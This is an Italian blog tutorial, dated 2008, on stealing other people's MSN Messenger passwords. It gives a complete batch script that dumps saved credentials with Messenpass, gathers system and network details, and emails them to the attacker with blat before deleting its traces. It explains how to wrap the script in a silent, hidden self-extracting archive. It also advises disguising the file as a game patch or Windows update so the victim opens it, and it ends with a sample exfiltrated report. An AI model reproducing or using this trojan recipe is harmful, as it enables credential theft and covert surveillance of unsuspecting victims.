Home

Prendere le password di MSN Messenger

August 13th, 2008 | inserito da BeGa
in

Intanto incomincio dicendo che QUESTA GUIDA E' STATA SCRITTA COME guida a scopo informativo e sono cavoli vostri se avrete casini..Non è mia la responsabilità..
 

Requisiti:
_un pc
_un editor di testo, consiglio Notepad++ o il blocco note
_due archivi
_un programma che permette di costruire file autoestraenti(Winrar)
_un file BAT
_un indirizzo di posta elettronica che supporti il POP3/IMAP4( No hotmail) Es: Alice, Tiscali, Fastweb,Libero, TIN, Yahoo..

La password verra recuperata soltanto se la vittima avrà cliccato l'opzione su MSN Live Messenger: "Accedi automaticamnete"

Allora troverete tutto tranne il blocco note e il pc :p

1 fase: Aprire il blocco note da start esegui e scrivete "notepad" senza le virgolette
        Se avete Notepad ++ apritelo.

Incollate nel blocco note/Notepad++ il seguente bat:

@echo off
mspass.exe /stext Psw.txt
echo. >> Psw.txt
cls
echo COMPUTERNAME = %COMPUTERNAME% >> Psw.txt
echo USERNAME = %­USERNAME% >> Psw.txt
echo USERDOMAIN = %­USERDOMAIN% >> Psw.txt
echo USERPROFILE = %­USERPROFILE% >> Psw.txt
echo. >> Psw.txt
echo Oggi e’ %DATE% e sono le %­TIME% >> Psw.txt
echo. >> Psw.txt
ipconfig /all >> Psw.txt
echo. >> Psw.txt
netstat -na >> Psw.txt
cls
blat -install out.alice.it mail@email.it
cls
blat Psw.txt -to mail@email.it
cls
del Psw.txt
del mailpv.exe
del blat.exe
del Msn.bat

Mi raccomando, NON MODIFICATE NULLA TRANNE

blat -install out.alice.it mail@email.it

blat Psw.txt -to mail@email.it

Come indirizzo email mettete il vostro, quello che supporta il POP3/IMAP4 e in out.alice.it dovete mettere il vostro server SMTP. Per sapere il vostro server andate qui

Salvate il seguente file da File, Salva con nome  "BLAT.bat" stavolta con le virgolette in una cartella che volete..

2 fase:        Scaricate BLAT e MESSENPASS cliccando sui link posti sotto

Scaricate da qua Winrar.E' un programma per creare archivi RAR e Autoestraenti. Installatelo(ci metterà 1 minuto, non ricordo). Al termine dell installazione, comparirà una finestra di scelta. Selezioante tutte le opzioni

BLAT è un utility che permette lo scambio di mail da linea di comando e Messenpass è un utility della Nirsoft per il recupero di password dei programmi di messaggeria istantanea

Estraete i due archivi nella cartella in cui avete salvato BLAT.bat, selezionate tutti i file e cliccateci col destro e scegliete Winrar --> Aggiungi all Archivio "nomefile.rar".

Aprite l'archivio appena fatto e nella barra in alto cliccate su Autoestraente
Cliccate su "Opzioni avanzate del modulo autoestraente" e nel Percorso d'estrazione scrivete

C:\Windows\System32

In Esegui dopol'estrazione scrivete BLAT.bat.
Nella scheda in alto Modalità, selezioante l'opzione Nascondi tutto. Questa opzione fa si che non faccia vedere nessuna finestra alla vittima..

Date OK a tutte le finestre e verrà creato un autoestraente.

Prossimo passo...Il social engineering...Cosa è??? In italiano significa "ingegneria sociale" e si tratta dello studio del comportamento individuale di una persona al fine di ottenere informazioni.
Sono stati scritti moltissimi libri sul Social Engineering, il piu bello è quello di Kevin Mitnick - L'arte dell'inganna..Può essere utilissimo a volte il social engineering, come in guerra..
Esempio, se al contatto che dovrai "rubare" la password piacciono i videogiochi e magari FarCry, gli metterai come nome dell autoestraente "Patch Aggiornamento FarCry"
Così lui abboccherà meglio....Il nome con cui la gente ci casca di più è Aggiornamenti Automatici Windows...
Inviategli via Messenger l'archivio e chiedetegli di aprirlo per i motivi che VOI inventerete..Lui lo aprirà e dopo quasi un millesimo di secondo arriverà alla mail che avete messo una mail con TUTTE le informazioni sul uo PC e l'user-id e la PASSOWRD.
La mail è simile a questa:

==================================================
Software          : Windows Live Messenger
Protocol          : MSN Messenger
User              : francesco_conan@msn.com
Password          : ti piacerebbe,eh???
==================================================

COMPUTERNAME = BeGaPc-I7N8NX7URE
USERNAME =
USERDOMAIN =
USERPROFILE =

Oggi e’ 07/07/2008 e sono le 02:17

Configurazione IP di Windows

        Nome host . . . . . . . . . . . . . . : begapc-i7n8nx7ure
        Suffisso DNS primario  . . . . . . .  :
        Tipo nodo . . . . . . . . .  : Sconosciuto
        Routing IP abilitato. . . . . . . . . : Si
        Proxy WINS abilitato . . . . . . . .  : Sì

Scheda Ethernet VMware Network Adapter VMnet8:

        Suffisso DNS specifico per connessione:
        Descrizione . . . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet8
        Indirizzo fisico. . . . . . . . . . . : 00-50-56-C0-00-08
        DHCP abilitato. . . . . . . . . . . . : No
        Indirizzo IP. . . . . . . . . . . . . : 192.168.177.1
        Subnet mask . . . . . . . . . . . . . : 255.255.255.0
        Gateway predefinito . . . . . . . . . :

Scheda Ethernet VMware Network Adapter VMnet1:

        Suffisso DNS specifico per connessione:
        Descrizione . . . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet1
        Indirizzo fisico. . . . . . . . . . . : 00-50-56-C0-00-01
        DHCP abilitato. . . . . . . . . . . . : No
        Indirizzo IP. . . . . . . . . . . . . : 192.168.125.1
        Subnet mask . . . . . . . . . . . . . : 255.255.255.0
        Gateway predefinito . . . . . . . . . :

Scheda Ethernet Connessione alla rete locale (LAN):

        Suffisso DNS specifico per connessione:
        Descrizione . . . . . . . . . . . . . : VIA Rhine III Fast Ethernet Adapter
        Indirizzo fisico. . . . . . . . . . . : 00-11-09-79-D7-95
        DHCP abilitato. . . . . . . . . . . . : Sì
        Configurazione automatica abilitata   : Sì
        Indirizzo IP. . . . . . . . . . . . . : 192.168.1.2
        Subnet mask . . . . . . . . . . . . . : 255.255.255.0
        Gateway predefinito . . . . . . . . . : 192.168.1.1
        Server DHCP . . . . . . . . . . . . . : 192.168.1.1
        Server DNS . . . . . . . . . . . . .  : 192.168.1.1
        Lease ottenuto. . . . . . . . . . . . : venerdì 27 giugno 2008 19.18.50
        Scadenza lease . . . . . . . . . . .  : Sabato 30 giugno 2008 20.18.50

Scheda Ethernet Connessione alla rete locale (LAN) 3:

        Stato supporto . . . . . . . . . . . : Supporto disconnesso
        Descrizione . . . . . . . . . . . . . : Bluetooth PAN Network Adapter
        Indirizzo fisico. . . . . . . . . . . : 00-11-67-5C-3F-FB

Connessioni attive

  Proto  Indirizzo locale       Indirizzo esterno       Stato
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2000           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4567           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12725          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:44080          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:44110          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1039         127.0.0.1:27015        ESTABLISHED
  TCP    127.0.0.1:1045         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1061         127.0.0.1:44080        CLOSE_WAIT
  TCP    127.0.0.1:3443         127.0.0.1:44080        CLOSE_WAIT
  TCP    127.0.0.1:3675         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3677         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3681         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3685         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3690         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3692         127.0.0.1:44080        TIME_WAIT
  TCP    127.0.0.1:3694         127.0.0.1:44080        ESTABLISHED
  TCP    127.0.0.1:3696         127.0.0.1:44080        ESTABLISHED
  TCP    127.0.0.1:3698         127.0.0.1:44080        ESTABLISHED
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:27015        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:27015        127.0.0.1:1039         ESTABLISHED
  TCP    127.0.0.1:44080        127.0.0.1:3683         TIME_WAIT
  TCP    127.0.0.1:44080        127.0.0.1:3690         TIME_WAIT
  TCP    127.0.0.1:44080        127.0.0.1:3694         ESTABLISHED
  TCP    127.0.0.1:44080        127.0.0.1:3696         ESTABLISHED
  TCP    127.0.0.1:44080        127.0.0.1:3698         ESTABLISHED
  TCP    192.168.1.2:139        0.0.0.0:0              LISTENING
  TCP    192.168.1.2:1505       77.247.178.244:443     ESTABLISHED
  TCP    192.168.1.2:1634       87.217.14.202:4662     ESTABLISHED
  TCP    192.168.1.2:1665       83.197.83.49:4662      ESTABLISHED
  TCP    192.168.1.2:1666       82.61.226.131:26353    ESTABLISHED
  TCP    192.168.1.2:2108       151.77.67.18:59721     ESTABLISHED
  TCP    192.168.1.2:3213       85.240.245.222:8712    ESTABLISHED
  TCP    192.168.1.2:3374       88.11.13.222:16640     ESTABLISHED
  TCP    192.168.1.2:3384       80.181.103.56:4662     ESTABLISHED
  TCP    192.168.1.2:3385       86.208.133.216:12244   ESTABLISHED
  TCP    192.168.1.2:3676       65.55.187.74:80        TIME_WAIT
  TCP    192.168.1.2:3678       65.55.187.74:80        TIME_WAIT
  TCP    192.168.1.2:3686       65.55.187.74:80        TIME_WAIT
  TCP    192.168.1.2:3688       65.55.172.10:80        TIME_WAIT
  TCP    192.168.1.2:3695       65.55.187.74:80        ESTABLISHED
  TCP    192.168.1.2:3697       65.55.187.74:80        ESTABLISHED
  TCP    192.168.1.2:3699       65.55.172.10:80        ESTABLISHED
  TCP    192.168.1.2:4567       77.125.106.8:1820      ESTABLISHED
  TCP    192.168.1.2:4567       79.180.155.170:4095    ESTABLISHED
  TCP    192.168.1.2:4567       79.183.157.164:2443    ESTABLISHED
  TCP    192.168.1.2:4567       81.193.19.53:1648      TIME_WAIT
  TCP    192.168.1.2:4567       83.54.68.40:10043      TIME_WAIT
  TCP    192.168.1.2:4567       83.56.202.163:58866    TIME_WAIT
  TCP    192.168.1.2:4567       83.132.192.21:50313    TIME_WAIT
  TCP    192.168.1.2:4567       83.192.238.18:2477     SYN_RECEIVED
  TCP    192.168.1.2:4567       84.46.225.157:4439     TIME_WAIT
  TCP    192.168.1.2:4567       84.77.31.253:3158      TIME_WAIT
  TCP    192.168.1.2:4567       84.79.149.61:1762      ESTABLISHED
  TCP    192.168.1.2:4567       85.59.115.45:1180      ESTABLISHED
  TCP    192.168.1.2:4567       85.136.3.115:3510      ESTABLISHED
  TCP    192.168.1.2:4567       87.4.147.142:2824      TIME_WAIT
  TCP    192.168.1.2:4567       87.8.62.134:1175       TIME_WAIT
  TCP    192.168.1.2:4567       87.9.101.226:4153      TIME_WAIT
  TCP    192.168.1.2:4567       90.23.10.166:56030     TIME_WAIT
  TCP    192.168.1.2:4567       151.20.8.84:16683      TIME_WAIT
  TCP    192.168.1.2:4567       151.21.4.51:2053       ESTABLISHED
  TCP    192.168.1.2:4567       190.31.186.137:3156    TIME_WAIT
  TCP    192.168.1.2:4567       190.48.119.65:64357    FIN_WAIT_1
  TCP    192.168.1.2:4567       201.3.207.34:50599     TIME_WAIT
  TCP    192.168.1.2:4567       201.79.160.94:1501     FIN_WAIT_1
  TCP    192.168.125.1:139      0.0.0.0:0              LISTENING
  TCP    192.168.177.1:139      0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*                  
  UDP    0.0.0.0:500            *:*                  
  UDP    0.0.0.0:1036           *:*                  
  UDP    0.0.0.0:1040           *:*                  
  UDP    0.0.0.0:1041           *:*                  
  UDP    0.0.0.0:1043           *:*                  
  UDP    0.0.0.0:1044           *:*                  
  UDP    0.0.0.0:2097           *:*                  
  UDP    0.0.0.0:2100           *:*                  
  UDP    0.0.0.0:2101           *:*                  
  UDP    0.0.0.0:2377           *:*                  
  UDP    0.0.0.0:4500           *:*                  
  UDP    0.0.0.0:4901           *:*                  
  UDP    0.0.0.0:8910           *:*                  
  UDP    0.0.0.0:12725          *:*                  
  UDP    127.0.0.1:123          *:*                  
  UDP    127.0.0.1:1900         *:*                  
  UDP    127.0.0.1:2048         *:*                  
  UDP    127.0.0.1:3981         *:*                  
  UDP    192.168.1.2:123        *:*                  
  UDP    192.168.1.2:137        *:*                  
  UDP    192.168.1.2:138        *:*                  
  UDP    192.168.1.2:1900       *:*                  
  UDP    192.168.1.2:5353       *:*                  
  UDP    192.168.125.1:123      *:*                  
  UDP    192.168.125.1:137      *:*                  
  UDP    192.168.125.1:138      *:*                  
  UDP    192.168.125.1:1900     *:*                  
  UDP    192.168.125.1:5353     *:*                  
  UDP    192.168.177.1:123      *:*                  
  UDP    192.168.177.1:137      *:*                  
  UDP    192.168.177.1:138      *:*                  
  UDP    192.168.177.1:1900     *:*                  
  UDP    192.168.177.1:5353     *:*

Quello che a noi interessa è la prima parte....
Per dubbi o chiarimenti aprite un post nel forum